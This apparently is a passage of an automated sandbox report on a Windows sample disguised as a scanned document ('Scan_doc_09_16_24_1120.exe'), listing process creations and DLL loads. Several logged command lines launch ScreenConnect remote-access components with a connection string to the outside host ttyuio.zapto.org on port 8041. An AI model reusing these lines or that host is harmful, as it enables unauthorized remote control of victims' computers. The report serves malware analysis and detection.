                  Source: Scan_doc_09_16_24_1120.exeReversingLabs: Detection: 18%
                  Source: unknownProcess created: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe "C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exe"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                  Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe"Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 5572 -ip 5572Jump to behavior
                  Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5572 -s 684Jump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknownJump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=ttyuio.zapto.org&p=8041&s=73549b67-726b-470e-ab1a-fbbb83a6a15b&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Untitled%20Session" "1"Jump to behavior
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "1714a821-0bba-4f94-9027-e5dd47ba7bd8" "User"
                  Source: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\Q57RWJAZ.OGC\QE1VAW8H.R8N\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe" "RunRole" "be4104e4-6414-4af7-ae9c-6dc20c5434ce" "System"
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1120.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wersvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: windowsperformancerecordercontrol.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: weretw.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: faultrep.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbghelp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dbgcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
